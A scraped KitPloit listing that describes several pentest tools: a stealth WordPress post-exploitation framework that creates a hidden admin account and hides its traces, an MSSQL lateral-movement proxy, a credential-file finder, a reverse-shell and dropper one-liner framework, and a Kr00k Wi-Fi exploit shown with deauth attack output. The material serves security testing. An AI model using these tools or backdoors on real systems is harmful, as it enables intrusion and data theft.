Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Tinfoil Chat - Onion-routed, Endpoint Secure Messaging System

$
0
0

Tinfoil Chat (TFC) is a FOSS+FHDpeer-to-peer messaging system that relies on high assurance hardware architecture to protect users from passive collection, MITM attacks and most importantly, remote key exfiltration. TFC is designed for people with one of the most complex threat models: organized crime groups and nation state hackers who bypass end-to-end encryption of traditional secure messaging apps by hacking the endpoint.

State-of-the-art cryptography
TFC uses XChaCha20-Poly1305end-to-end encryption with deniable authentication to protect all messages and files sent to individual recipients and groups. The symmetric keys are either pre-shared, or exchanged using X448, the base-10 fingerprints of which are verified via an out-of-band channel. TFC provides per-message forward secrecy with BLAKE2b based hash ratchet. All persistent user data is encrypted locally using XChaCha20-Poly1305, the key of which is derived from password and salt using Argon2id, the parameters of which are automatically tuned according to best practices. Key generation of TFC relies on Linux kernel's getrandom(), a syscall for its ChaCha20 based CSPRNG.

Anonymous by design
TFC routes all communication exclusively through the Tor anonymity network. It uses the next generation (v3) Tor Onion Services to enable P2P communication that never exits the Tor network. This makes it hard for the users to accidentally deanonymize themselves. It also means that unlike (de)centralized messengers, there's no third party server with access to user metadata such as who is talking to whom, when, and how much. The network architecture means TFC runs exclusively on the user's devices. There are no ads or tracking, and it collects no data whatsoever about the user. All data is always encrypted with keys the user controls, and the databases never leave the user's device.
Using Onion Services also means no account registration is needed. During the first launch TFC generates a random TFC account (an Onion Service address) for the user, e.g. 4sci35xrhp2d45gbm3qpta7ogfedonuw2mucmc36jxemucd7fmgzj3ad. By knowing this TFC account, anyone can send the user a contact request and talk to them without ever learning their real life identity, IP-address, or geolocation. Protected geolocation makes physical attacks very difficult because the attacker doesn't know where the device is located on the planet. At the same time it makes the communication censorship resistant: Blocking TFC requires blocking Tor categorically, nation-wide.
TFC also features a traffic masking mode that hides the type, quantity, and schedule of communication, even if the network facing device of the user is hacked. To provide even further metadata protection from hackers, the Internet-facing part of TFC can be run on Tails, a privacy and anonymity focused operating system that contains no personal files of the user (which makes it hard to deduce to whom the endpoint belongs to), and that provides additional layers of protection for their anonymity.

First messaging system with endpoint security
TFC is designed to be used in hardware configuration that provides strong endpoint security. This configuration uses three computers per endpoint: Encryption and decryption processes are separated from each other onto two isolated computers, the Source Computer, and the Destination Computer. These two devices are are dedicated for TFC. This split TCB interacts with the network via the user's daily computer, called the Networked Computer.
In TFC data moves from the Source Computer to the Networked Computer, and from the Networked Computer to the Destination Computer, unidirectionally. The unidirectionality of data flow is enforced, as the data is passed from one device to another only through a free hardware design data diode, that is connected to the three computers using one USB-cable per device. The Source and Destination Computers are not connected to the Internet, or to any device other than the data diode.


TFC data diode

Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics. This protection is so strong, the certified implementations of data diodes are typically found in critical infrastructure protection and government networks where the classification level of data varies between systems. A data diode might e.g. allow access to a nuclear power plant's safety system readings, while at the same time preventing attackers from exploiting these critical systems. An alternative use case is to allow importing data from less secure systems to ones that contain classified documents that must be protected from exfiltration.
In TFC the hardware data diode ensures that neither of the TCB-halves can be accessed bidirectionally. Since the protection relies on physical limitations of the hardware's capabilities, no piece of malware, not even a zero-day exploit can bypass the security provided by the data diode.

How it works
With the hardware in place, all that's left for the users to do is launch the device specific TFC program on each computer.


System overview

In the illustration above, Alice enters messages and commands to Transmitter Program running on her Source Computer. The Transmitter Program encrypts and signs plaintext data and relays the ciphertexts from Source Computer to her Networked Computer through the data diode.
Relay Program on Alice's Networked Computer relays commands and copies of outgoing messages to her Destination Computer via the data diode. Receiver Program on Alice's Destination Computer authenticates, decrypts and processes the received message/command.
Alice's Relay Program shares messages and files to Bob over a Tor Onion Service. The web client of Bob's Relay Program fetches the ciphertext from Alice's Onion Service and forwards it to his Destination Computer through his data diode. Bob's Receiver Program then authenticates, decrypts and processes the received message/file.
When Bob responds, he will type his message to the Transmitter Program on his Source Computer, and after a mirrored process, Alice reads the message from the Receiver Program on her Destination Computer.

Why keys and plaintexts cannot be exfiltrated
The architecture described above simultaneously utilizes both the classical and the alternative data diode models to enable bidirectional communication between two users, while at the same time providing hardware enforced endpoint security:
  1. The Destination Computer uses the classical data diode model. This means it can receive data from the insecure Networked Computer, but is unable to send data back to the Networked Computer. The Receiver Program is designed to function under these constraints. However, even though the program authenticates and validates all incoming data, it is not ruled out malware couldn't still infiltrate the Destination Computer. However, in the event that would happen, the malware would be unable to exfiltrate sensitive keys or plaintexts back to the Networked Computer, as the data diode prevents all outbound traffic.
  2. The Source Computer uses the alternative data diode model. This means it can output encrypted data to the insecure Networked Computer without having to worry about being compromised: The data diode protects the Source Computer from all attacks by physically preventing all inbound traffic. The Transmitter Program is also designed to work under the data flow constraints introduced by the data diode; To allow key exchanges, the short elliptic-curve public keys are input manually by the user.
  3. The Networked Computer is designed under the assumption it can be compromised by a remote attacker: All sensitive data that passes through the Relay Program is encrypted and signed with no exceptions. Since the attacker is unable to exfiltrate decryption keys from the Source or Destination Computer, the ciphertexts are of no value to the attacker.

Exfiltration security

Qubes-isolated intermediate solution
For some users the APTs of the modern world are not part of the threat model, and for others, the requirement of having to build the data diode by themselves is a deal breaker. Yet, for all of them, storing private keys on a networked device is still a security risk.
To meet these users' needs, TFC can also be run in three dedicated Qubes virtual machines. With the Qubes configuration, the isolation is provided by the Xen hypervisor, and the unidirectionality of data flow between the VMs is enforced with strict firewall rules. This intermediate isolation mechanism runs on a single computer which means no hardware data diode is needed.

Supported Operating Systems

Source/Destination Computer
  • Debian 10
  • PureOS 9.0
  • *buntu 19.10
  • LMDE 4
  • Qubes 4 (Debian 10 VM)

Networked Computer
  • Tails 4.0
  • Debian 10
  • PureOS 9.0
  • *buntu 19.10
  • LMDE 4
  • Qubes 4 (Debian 10 VM)

More information
Threat model
FAQ
Security design
Hardware Data Diode
    Breadboard version (Easy)
    Perfboard version (Intermediate)
    PCB version (Advanced)
How to use
    Installation
    Master password setup
    Local key setup
    Onion Service setup
    X448 key exchange
    Pre-shared keys
    Commands
Update log



ProjectOpal - Stealth Post-Exploitation Framework For Wordpress

$
0
0

Stealth post-exploitation framework for Wordpress CMS
Official ProjectOpal Repository.

What is it and why was it made?
We intentionally made it for our penetration testing jobs however its getting grey hairs now so we thought we would like to pass it on to the public!. ProjectOpal or Opal.
Is a stealth post exploit framework for wordpress sites that can hide its trace from logs and obfuscate it's way through the system! :)
Fun cool features it creates a admin user that is hidden from all users including admins! just note its stored in the database so don't forget to delete your traces.

WORDPRESS:
Login: opal@wordpress.com
(Default) Pass: QCa9KT4eAvxzC5Kk or projectopal
Backend Login:
(Default) Login: QCa9KT4eAvxzC5Kk
LOGINTAMP:
allows you to login to any user
CHAPPY:
Creates a administrator account
USERDUMP:
Dumps all user entries
LOCATE:
Gets implant location
If you need any help feel free to contact us at sales@shadowlabs.cc.
Enjoy!

Getting Started
Clone the repository with git:
git clone https://github.com/shadowlabscc/ProjectOpal.git && cd ProjectOpal
python opal.py
or
python Injector.py (Edit the config.py!)
You will see a start-up screen. Type help and get to know your shell better :)

Features:
These are features that Shadowlabs Team prides themself on based on this program:
  • Bypass WAF(Web application firewall)
  • Hidden/Stealth
  • Let's you login to any user
  • Dump entire user entries
  • Create a persistent admin account that is hidden
  • Obfuscated implant
  • Multi-functionality
├── Injector
│   ├── Dolly2.zip
│   ├── Injector.py
│   └── config.py
├── Wordpress
│   ├── 64fc9f8191afee3231e7197a27b8ee0c.php
│   ├── index.php
│   └── install.php
├── lib
│   ├── banner.txt
│   ├── config.password
│   ├── config.target
│   └── persistent_head.txt
└── opal.py


Mssqlproxy - A Toolkit Aimed To Perform Lateral Movement In Restricted Environments Through A Compromised Microsoft SQL Server Via Socket Reuse

$
0
0




mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse. The client requires impacket and sysadmin privileges on the SQL server.

Please read this article carefully before continuing.
It consists of three parts:
  • CLR assembly: Compile assembly.cs
  • Core DLL: Compile reciclador.sln
  • Client: mssqlclient.py (based on Impacket's example)
You can compile the libraries or download them from releases (x64).

Compilation
To generate the core DLL, just import the project to Visual Studio (reciclador.sln) and compile it.
To generate the CLR assembly, first you need to find the C# compiler:
Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname
Then,
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library .\assembly.cs

Usage
Once the two libraries are compiled, upload the core DLL (reciclador) to the target server.
Authentication options are the same as the ones in the original mssqlclient. mssqlproxy options:
proxy mode:
-reciclador path Remote path where DLL is stored in server
-install Installs CLR assembly
-uninstall Uninstalls CLR assembly
-check Checks if CLR is ready
-start Starts proxy
-local-port port Local port to listen on
-clr local_path Local CLR path
-no-check-src-port Use this option when connection is not direct (e.g. proxy)
We have also implemented two commands (within the SQL shell) for downloading and uploading files. Relating to the proxy stuff, we have four commands:
  • install: Creates the CLR assembly and links it to a stored procedure. You need to provide the -clr param to read the generated CLR from a local DLL file.
  • uninstall: Removes what install created.
  • check: Checks if everything is ready to start the proxy. Requires to provide the server DLL location (-reciclador), which can be uploaded using the upload command.
  • start: Starts the proxy. If -local-port is not specified, it will listen on port 1337/tcp.
Once the proxy is started, you can plug in your proxychains ;)
mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse. (4)
Note #1: if using a non-direct connection (e.g. proxies in between), the -no-check-src-port flag is needed, so the server only checks the source address.
Note #2: at the moment, only IPv4 targets are supported (nor DNS neither IPv6 addresses).
Note #3: use carefully! by now the MSSQL service will crash if you try to establish multiple concurrent connections
Important: It's important to stop the mssqlproxy by pressing Ctrl+C on the client. If not, the server may crash and you will have to restart the MSSQL service manually.

Authors
Pablo Martinez (@xassiz), Juan Manuel Fernandez (@TheXC3LL)

References

License
All the code included in this project is licensed under the terms of the MIT license. The mssqlclient.py is based on Impacket.


mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse. (5)mssqlproxy i   s a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse. (6)mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reu   se. (7)


InQL Scanner - A Burp Extension For GraphQL Security Testing

$
0
0

A security testing tool to facilitate GraphQL technology security auditing efforts.

InQL can be used as a stand-alone script, or as a Burp Suite extension.

InQL Stand-Alone
Running inql from Python will issue an Introspection query to the target GraphQL endpoint in order fetch metadata information for:
  • Queries, mutations, subscriptions
  • Its fields and arguments
  • Objects and custom objects types
InQL can inspect the introspection query results and generate clean documentation in different formats, such as HTML and JSON schema. InQL is also able to generate templates (with optional placeholders) for all known basic data types.
The resulting HTML documentation page will contain details for all available Queries, Mutations, and Subscriptions as shown here:


The following screenshot shows the use of templates generation:


For all supported options, check the command line help:
usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
[--header HEADERS HEADERS] [-d] [--generate-html]
[--generate-schema] [--generate-queries] [--insecure]
[-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
-h, --help show this help message and exit
-t TARGET Remote GraphQL Endpoint (https://<Target_IP>/graphql)
-f SCHEMA_JSON_FILE Schema file in JSON format
-k KEY API Authentication Key
-p PROXY IP of web proxy to go through (http://127.0.0.1:8080)
--header HEADERS HEADERS
-d Replace known GraphQL arguments types with placeholder
values (useful for Burp Suite)
--generate-html Generate HTML Documentation
--generate-schema Generate JSON Schema Documentation
--generate-queries Generate Queries
--insecure Accept any SSL/TLS certificate
-o OUTPUT_DIRECTORY Output Directory

InQL Burp Suite Extension
Since version 1.0 of the tool, InQL was extended to operate within Burp Suite. In this mode, the tool will retain all the capabilities of the stand-alone script plus a handy user interface to manipulate queries.
Using the inql extension for Burp Suite, you can:
  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common consoles)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the templates generation by sending those requests to Burp's Repeater tool
  • Configure the tool by using a custom settings tab


To use inql in Burp Suite, import the Python extension:
  • Download the Jython Jar
  • Start Burp Suite
  • Extender Tab > Options > Python Enviroment > Set the location of Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Download the latest inql_burp.py release here
  • Extension File > Set the location of inql_burp.py> Next
  • The output should now show the following message: InQL Scanner Started!
In future, we might consider integrating the extension within the Burp's BApp Store.

Burp Extension Usage
Getting started with inql Burp extension is easy:
  1. Load a GraphQL endpoint or a JSON schema file location inside the top input field
  2. Press the "Load" button
  3. After few seconds, the left panel will refresh loading the directory structure for the selected endpoint as in the following example:
  • url
    • query
      • timestamp 1
        • query1.query
        • query2.query
      • timestamp 2
        • query1.query
        • query2.query
    • mutation
    • subscription
  1. Selecting any query/mutation/subscription will load the corresponding template in the main text area

Credits
Author and Maintainer: Andrea Brancaleoni (@nJoyneer - thypon)
Original Author: Paolo Stagno (@Void_Sec - voidsec.com)
This project was made with love in Doyensec Research island.


Webkiller v2.0 - Tool Information Gathering

$
0
0

Tool Information Gathering Write With Python.

PreView


██╗ ██╗███████╗██████╗ ██╗ ██╗██╗██╗ ██╗ ███████╗██████╗
██║ ██║██╔════╝██╔══██╗██║ ██╔╝██║██║ ██║ ██╔════╝██╔══██╗
██║ █╗ ██║█████╗ ██████╔╝████&#9608 ;╔╝ ██║██║ ██║ █████╗ ██████╔╝
██║███╗██║██╔══╝ ██╔══██╗██╔═██╗ ██║██║ ██║ ██╔══╝ ██╔══██╗
╚███╔███╔╝███████╗██████╔╝██║ ██╗██║███████╗███████╗██████&# 9608;╗██║ ██║
╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝
====================================================================
** WebSite : UltraSec.org **
** Channel : @UltraSecurity **
** Developers : Ultra Security Team **
** Team Members : Ashkan Moghaddas , Behzad Khalifeh , AmirMohammad Safari **
** Thank's : .::Shayan::. **
====================================================================

[卐] Choose one of the options below

[1] Information Gathering

[2] CMS Detection

[3] Developer :)

[4] Exit . . .

┌─[WEBKILLER~@HOME]
└──╼ 卐

Operating Systems Tested
  • Kali Linux 2020.1
  • Windows 10
  • Ubuntu 19.10

Install
git clone https://github.com/ultrasecurity/webkiller.git
cd webkiller
pip3 install -r requirements.txt
python3 webkiller.py

Video Tutorial


Thanks to
Ashkan Moghaddas - Ultra Security Team Leader
Behzad Khalifeh- Ultra Security Team Programmer
AmirMohammad Safari - WebApplication Pentester

Contact us


SauronEye - Search Tool To Find Specific Files Containing Specific Words, I.E. Files Containing Passwords

$
0
0

SauronEye is a search tool built to aid red teams in finding files containing specific keywords.

Features:
  • Search multiple (network) drives
  • Search contents of files
  • Search contents of Microsoft Office files (.doc, .docx, .xls, .xlsx)
  • Find VBA macros in old 2003 .xls and .doc files
  • Search multiple drives multi-threaded for increased performance
  • Supports regular expressions in search keywords
  • Compatible with Cobalt Strike's execute-assembly
It's also quite fast, can do 50k files, totaling 1,3 TB on a network drive in under a minute (with realistic file filters). Searches a C:\ (on a cheap SATA SSD) in about 15 seconds.

Usage
SauronEye.exe --directories C:\ \\SOMENETWORKDRIVE\C$ --filetypes .txt .bat .docx .conf --contents --keywords password pass*
         === SauronEye ===

Directories to search: C:\Users\vincent\Desktop\
For file types: .txt, .doc, .docx, .xls
Containing: wacht, pass
Search contents: True
Search Office 2003 files for VBA: True
Max file size: 1000 KB
Search Program Files directories: False
Searching in parallel: C:\Users\vincent\Desktop\
[+] C:\Users\vincent\Desktop\test\wachtwoord - Copy (2).txt
[+] C:\Users\vincent\Desktop\test\wachtwoord - Copy (3).txt
[+] C:\Users\vincent\Desktop\test\wachtwoord - Copy.txt
[+] C:\Users\vincent\Desktop\test\wachtwoord.txt
[+] C:\Users\vincent\Desktop\pass.txt
[*] Done searching file system, now searching contents
[+] C:\Users\vincent\Desktop\pass.txt
...the admin password=admin123...

[+] C:\Users\vincent\Desktop\test.docx:
...this is a testPassword = "welkom12...


Done. Time elapsed = 00:00:01.6656911
C:\>SauronEye.exe --help

=== SauronEye ===

Usage: SauronEye.exe [OPTIONS]+ argument
Search directories for files containing specific keywords.

Options:
-d, --directories=VALUE Directories to search
-f, --filetypes=VALUE Filetypes to search for/in
-k, --keywords=VALUE Keywords to search for
-c, --contents Search file contents
-m, --maxfilesize=VALUE Max file size to search contents in, in kilobytes
-b, --beforedate=VALUE Filter files last modified before this date,
format: yyyy-MM-dd
-a, --afterdate=VALUE Filter files last modified after this date,
format: yyyy-MM-dd
-s, --systemdirs Search in filesystem directories %APPDATA% and %
WIND OWS%
-v, --vbamacrocheck Check if 2003 Office files (*.doc and *.xls)
contain a VBA macro
-h, --help Show help

Notes
SauronEye does not search %WINDIR% and %APPDATA%. Use the --systemdirs flag to search the contents of Program Files*. SauronEye relies on functionality only available from .NET 4.7.2, and so requires >= .NET 4.7.2 to run.


Project iKy v2.4.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface

$
0
0

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt
python3 -m pip install-r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencias

Inside the directory frontend install the dependencies
cd frontend
npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal
redis-server

Python stuff and Celery

Turn on Celery in another terminal, within the directory backend
./celery.sh
Again, in another terminal turn on backend app from directory backend
python3 app.py

Turn on Frontend

Finally, to run frontend server, execute the following command from directory frontend
npm start

Screen after turn on iKy


Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded
  • HaveIBeenPwned : Generate the APIs from here (Paid)
  • Emailrep.io : Generate the APIs from here

Wiki



Demo Videos


iKy eko15


iKy Version 2


Testing iKy with Emiliano


Testing iKy with Giba


iKy version 1

iKy version 0

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show "nice" things that you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator nor Contribute to the project.
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


One-Lin3r v2.1 - Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More

$
0
0

One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).

Screenshots




It consists of various one-liners types with various functions, some of them are:
One-liner functionWhat this function refers to
Reverse ShellVarious methods and commands to give you a reverse shell.
PrivEscMany commands to help in Enumeration and Privilege Escalation
Bind ShellVarious methods and commands to give you a bind shell.
DropperMany ways to download and execute various payload types with various methods.

Features
  • A lot of liners use with different purposes, currently are more than 155 liner.
  • The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
    • It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
    • For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
    • If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
    • Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
    • Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
  • Automation
    • You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
    • As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
    • Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
    • There are history and resource commands so you don't need to exit the framework.
    • You can execute as many commands as you want at the same time by splitting them with semi-colon.
    • Searching for any liner here is so easy and accurate, you can search for a liner by its name, function, description, author who added the liner to the framework or even the liner itself.
  • You can add your own liners by following these steps to create a liner as a python file. After that you can make a Pull request with it then it will be added in the framework and credited with your name of course .
  • The ability to reload the database if you added any liner without restarting the framework.
  • You can add any platform to the liners database just by making a folder in liners folder and creating a ".liner" file there.
  • More...
Note: The liners database is not too big but it will get bigger with updates and contributions.

Usage

Command-line arguments
usage: one-lin3r [-h] [-r R] [-x X] [-q]

optional arguments:
-h, --help show this help message and exit
-r Execute a resource file (history file).
-x Execute a specific command (use ; for multiples).
-q Quiet mode (no banner).

Framework commands
Command                     Description
-------- -------------
help/? Show this help menu.
list/show List all one-liners in the database.
search (-h) [Keywords..] Search database for a specific liner by its name, author name or function.
use <liner> Use an available one-liner.
copy <liner> Use an available one-liner and copy it to clipboard automatically.
info <liner> Get information about an available liner.
set <variable> <value> Sets a context-specific variable to a value to use while using one-liners.
variables Prints all previously specified variables.
banner Display banner.
reload/refresh Reload the liners database.
check Prints the core version and checks if you are up-to-date.
history Display command-line most important history from the beginning.
makerc Save command-line history to a file.
resource <file> Run the commands stored in a file
os <command> Execute a system command without closing the framework
exit/quit Exit the framework

Prerequisites before installing
  • Python 3.x.
  • Any OS, it should work on all but it's tested on Kali 2018+, Ubuntu 18+, Manjaro, Black Arch, Windows 10, Android Termux and Mac-OS 10.11

Installing and running
  • Using pip (The best way to install on any OS):
pip install one-lin3r
one-lin3r -h
  • Using pacman on Black Arch or any arch-based with black Arch repos:
sudo pacman -S one-lin3r
  • Installing it from GitHub:
    • For windows on cmd with administrator rights : (After downloading ZIP and unzip it)
    python -m pip install ./One-Lin3r-master --user
    one-lin3r -h
    • For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
    git clone https://github.com/D4Vinci/One-Lin3r.git
    sudo apt install libncurses5-dev
    sudo pip3 install ./One-Lin3r --user
    one-lin3r -h
    • For the rest Linux distros.:
    git clone https://github.com/D4Vinci/One-Lin3r.git
    sudo pip3 install ./One-Lin3r --user
    one-lin3r -h

Updating the framework or the database
  • If you installed it from pip do:
pip install one-lin3r --upgrade
  • If you installed it from GitHub do:
    • On Linux while outside the directory
    cd One-Lin3r&& git pull && cd ..
    pip3 install ./One-Lin3r --upgrade
    • On Windows if you don't have git installed, re-download the framework zipped!
Note: The liners are written as python modules, so it's considered as a part of the framework. So every new liner added to the framework, its version will get updated.

Contact

Disclaimer
One-Lin3r is created to help in penetration testing and it's not responsible for any misuse or illegal purposes.
Copying a code from this tool or using it in another tool is accepted as you mention where you got it from.
Pull requests are always welcomed :D

Credits and references



R00Kie-Kr00Kie - PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability

$
0
0

Disclaimer
This is a PoC exploit for the CVE-2019-15126 kr00k vulnerability.
This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials.


Requirements
To use these scripts, you will need a WiFi card supporting the active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n) we used to develop and test the code. We have tested this PoC on Kali Linux

Installation
# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt

How to use

Script: r00kie-kr00kie.py
This is the main exploit file that implements the kr00k attack
->~:python3 r00kie-kr00kie.py -h

usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, --channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, --bssid BSSID
Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
-c CLIENT, --client CLIENT
Set WiFi client MAC address (example:
"01:23:45:67:89:0b")
-n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
Set numb er of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, --quiet Minimal output
In order to start an attack, you need to know bssid of access points, its channel and mac address of the victim. You can find them using the airodump-ng wlan0 utility.
Run the exploit:
->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/



/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $ $| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1

https://hexway.io/research/r00kie-kr00kie/

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0xa649
###[ DNS ]###
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0x104b
###[ DNS ]###
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None
Also, if you have already intercepted traffic (pcap file) after the kr00t attack, you can decrypt:
->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
